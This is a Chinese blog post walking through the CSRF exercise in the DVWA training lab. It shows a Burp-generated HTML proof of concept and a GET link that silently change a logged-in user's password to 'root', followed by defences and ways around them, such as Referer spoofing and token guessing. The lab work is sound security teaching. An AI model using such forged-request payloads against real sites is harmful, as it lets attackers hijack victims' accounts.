【渗透测试-web安全】DVWA-CSRF

最新推荐文章于 2022-11-16 23:07:42 发布
最新推荐文章于 2022-11-16 23:07:42 发布
阅读量423 收藏
点赞数
分类专栏: 网络安全 文章标签: 渗透测试 web安全 DVWA CSRF 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harry_c/article/details/102859116
版权

【渗透测试-web安全】DVWA-CSRF

一、登录DVWA、设置安全级别为Low、进入CSRF

修改密码

在这里插入图片描述

抓包

在这里插入图片描述

使用burpsuite右键构造CSRF

	<html>
	  <!-- CSRF PoC - generated by Burp Suite Professional -->
	  <body>
	  <script>history.pushState('', '', '/')</script>
	    <form action="http://localhost/dvwa/vulnerabilities/csrf/">
	      <input type="hidden" name="password&#95;new" value="root" />
	      <input type="hidden" name="password&#95;conf" value="root" />
	      <input type="hidden" name="Change" value="Change" />
	      <input type="submit" value="ChangePassword" />
	    </form>
	  </body>
	</html

打开测试

在这里插入图片描述
点击修改密码成功:
在这里插入图片描述

二、CSRF构造解析

	通过抓包我们知道修改密码使用的是GET请求:

在这里插入图片描述
而且对应的网址为:

localhost/dvwa/vulnerabilities/csrf/?password_new=root&password_conf=root&Change=Change

	也就是说任何登录了这个站点的人点击访问构造的这个链接都会将密码改成root
	但是真的有人会点击这个链接吗?这不是侮辱智商
	所以就产生了我们之前的html代码,通过构造html来进行伪装将链接转换成我们无法识别的进行欺骗

三、防范与破解进阶

	之前我们使用的仅仅是Low等级的漏洞利用,

进阶防范1

设置refer请求头,非正常的请求头则拒绝对应的请求。

进阶破解之道1

其实请求头我们在自己构建站点的时候是可以模拟的,只需要将对应的站点根文件夹名称修改为正确的refer名称即可

进阶防范2

增加随机参数user_token这样攻击者在知道其他参数的情况下是无法知道token值的

进阶破解之道2

理论上我们的user_token也是可以暴力破解的(其实真的只是理论上的)

进阶防范3

如果说黑客能够破解对应的user_token那么修改密码的时候我们增加原密码进行校对,至此天衣无缝

Just_Do_Yite
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)
ElsonHY的博客
12-14 524
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)前言0x01 CSRF(跨站点请求伪造)CLASS LOWCLASS:MEDIUMCLASS:HIGH总结 前言 这时肯定有小伙伴要说了,“哎呀你怎么第二关的命令注入还没讲就直接讲第三关了???小R你不讲5的,我劝你耗子尾汁……” 开个玩笑,因为最近面试经常被问到关于CSRF的问题,也重新对该部分的理论基础复习了一下,想着趁热打铁,先写这一部分,这样写的过程思路也可能会相对清晰一点,下一篇一定写第二关= =(狗头保命)。 B
【工具-DVWADVWA渗透系列三:CSRF
qqchaozai的专栏
10-21 2225
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
DVWA靶机-跨站请求伪造(CSRF)
weixin_43726831的博客
10-22 1125
DVWA靶机-跨站请求伪造(CSRF) 引入:SQL注入是一种后端的攻击行为,通过浏览器发出请求,基于http/https协议将数据送给对方服务器,服务器通过WEB容器,将数据进行解析,实现与数据库的交互,CSRF是一种前端的注入。 CSRF攻击 CSRF(Cross-Site Request Forgery)是一种前端的注入,译为跨站请求伪造。 浏览器的同源策略:(Same origin pol...
PHP代码审计入门-DVWA靶场CSRF
身高两米不到的博客
11-16 1087
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。好的,文章内容代码不是重点,重点是逻辑和漏洞。然后产生疑惑, &dvwaSessionGrab函数为什么要加& ,百度一番没看懂,吐槽一下:他喵的就不能用朴实无华的语言写出来,非得装杯。因为什么限制也没做。
渗透测试-web安全】基于DVWA的测试实战环境搭建
harry_c的博客
10-24 845
渗透测试-web安全】基于DVWA的测试实战环境搭建本地搭建php环境DVWA的安装下载解压安装修改配置信息安装点击创建数据库进入登录页面账号密码DVWA测试内容介绍 除了DVWA外还有DSVW大家可以自行查找相关资料,后面有时间我也可能会写相关的教程 本地搭建php环境 这里我们利用最简单的集成环境,phpstudy(我们也可以用tomcat或者其他的服务创建web环境)。 首选访问 phps...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版,例如Samurai的Web测试框架等。
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
docker-dvwa:DVWA的Docker Compose设置
03-06
Dockerized DVWA在Dockerhub上有可用的官方... 您还可以通过以下方法在Web服务器容器上获取​​外壳程序: make enter :wrench: 配置 通过此设置,您可以通过.env文件配置一些设置。 多变的 默认 设定值 LISTE
58-58.渗透测试-DVWA靶场案例演示.mp4
最新发布
05-10
58-58.渗透测试-DVWA靶场案例演示.mp4
web安全-dvwa实战手
07-05
CSRF(跨站请求伪造):解释CSRF攻击是如何通过伪装用户合法请求来执行未授权的操作,以及如何在DVWA模拟和防御此类攻击。 3。文件包含:说明文件包含漏洞是如何允许攻击者包含或执行系统的文件,从而可能引发未...
Web漏洞实战教程(DVWA使用和漏洞分析)
10-30
1. WINDOWS环境准备 4 1.1 IIS安装 5 1.2 PHP安装 6 1.3 MYSQL服务器安装 14 1.4 DVWA安装 21 2. LINUX环境准备 25 3. 实战演练 25 3.1 实验须知 25 3.2 COMMAND EXECUTION VULNERABILITY 27 3.2.1 漏洞介绍 27 3.2.2 攻击实战 27 3.2.3 PHP源
[实验]csrf dvwa
foolisheddy
03-21 2765
dvwa low 级别测试 源代码 构造链接 dvwa medium 级别测试 源代码 漏洞利用 dvwa high 级别测试 源代码 漏洞利用 dvwa Impossible 级别测试 源代码 漏洞利用 参考list tips 新知识点清单 token php语法 语法作用 短链接 Anti-CSRF token机制 授权与未授权 请求域与Cookie信息所指定的域域dvwa low 级别测试:源
【无标题】使用dvwa环境进行csrf漏洞练习
qq_48744846的博客
04-13 247
Low: 通过Burpsuite抓取修改密码的报文 右键选择Engagement tools—>Generate CSRF PoC 生成构造好的攻击脚本,value就是要修改的密码 拷贝到根目录下 访问该html,并点击Submit request 密码修改成功 ...
DVWA--CSRF(全难度)
wwxxee
02-20 1032
DVWACSRF(跨站请求伪造) 原理参考:网络安全笔记-99-渗透-CSRF 逻辑 在输入输入密码,可修改当前用户的密码。 难度分级 Low 通过BP抓包,可以发现修改密码的请求是GET方式,直接修改GET请求参数就可以完成密码修改。 只要访问该链接即可修改密码: http://192.168.17.141/DVWA/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 在BP里
渗透测试-web安全DVWA-命令注入
harry_c的博客
10-28 589
渗透测试-web安全DVWA-命令注入一、实操二、怎么解决没有回显的命令注入延时注入远程请求三、防范命令注入 一、实操 设置low等级 使用功能 我们发现功能是直接使用输入IP地址系统反馈ping命令的结果 首先测试 127.0.0.1 使用命令拼接:127.0.0.1&&dir 很简单就实现了命令注入,当然这是简单的等级,其他级别自行尝试,有问题可以私信我的CS...
DVWACSRF(跨站请求伪造)
ximo的博客
01-28 283
DVWACSRF(跨站请求伪造) 目录DVWACSRF(跨站请求伪造)原理低等级一般方法利用poc实现结合存储型XSS利用等级高等级与XSS进行比较 原理 利用受害者尚未失效的身份认证信息、会话;诱骗其访问黑客设计好的页面,在受害人不知情的情况下以受害人的身份向服务器发送请求,完成非法操作。 框图: 低等级 一般方法 当前登录用户:1337 进行抓包: 构造恶意链接发送给受害者并使其访问: 当前登录用户:admin 访问恶意链接: 密码已被修改。 利用poc实现 抓包获取信息,右键选择poc生
DVWA实战测试之CSRF
0xdawn的博客
01-30 421
0x01 Low级别 源码分析 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? ...
DVWA靶场通关(CSRF
m0_56010012的博客
04-05 3045
CSRF(Cross-site request forgery),翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。而最常见的就是QQ空间的登陆。 CSRF属于业务逻辑漏洞,服务器信任经过身份认证的用户。 XSS属于技术漏洞,客
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 1万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
复现关于dvwaCSRF-token绕过实验
05-05
DVWA是一个漏洞练习平台,可以用于学习和测试Web应用程序的安全性。您可以从以下网站下载DVWA进行安装:https://github.com/ethicalhack3r/DVWA。 接下来,我们需要绕过CSRF-token进行攻击。CSRF-token是一种防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值